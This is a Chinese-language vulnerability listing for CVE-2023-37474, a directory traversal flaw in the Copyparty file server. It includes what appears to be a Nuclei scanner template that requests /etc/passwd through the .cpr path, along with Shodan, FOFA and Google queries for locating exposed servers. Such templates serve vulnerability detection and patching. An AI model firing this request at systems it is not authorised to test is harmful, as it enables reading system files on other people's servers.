CVE-2023-37474: Copyparty <= 1.8.2 - Directory Traversal

日期: 2025-08-01 | 影响软件: Copyparty | POC: 已公开

漏洞描述

Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.

PoC代码[已公开]

id: CVE-2023-37474

info:
  name: Copyparty <= 1.8.2 - Directory Traversal
  author: shankar acharya,theamanrawat
  severity: high
  description: |
    Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/9001/copyparty/
    - https://www.exploit-db.com/exploits/51636
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37474
    - http://packetstormsecurity.com/files/173822/Copyparty-1.8.2-Directory-Traversal.html
    - https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-37474
    cwe-id: CWE-22
    epss-score: 0.89933
    epss-percentile: 0.99555
    cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: copyparty_project
    product: copyparty
    shodan-query: http.title:"copyparty"
    fofa-query: title="copyparty"
    google-query: intitle:"copyparty"
  tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202d05be240d0a860bdea0d6a5d466b86a54a9777b018e065bb71afe2c5ea49c71022100a2065f2b8c5a23b4394217f37ca530df726b092e3ee5a5a21ebf4a7ecba56bc5:922c64590222798bb761d5b6d8e72950

相关漏洞推荐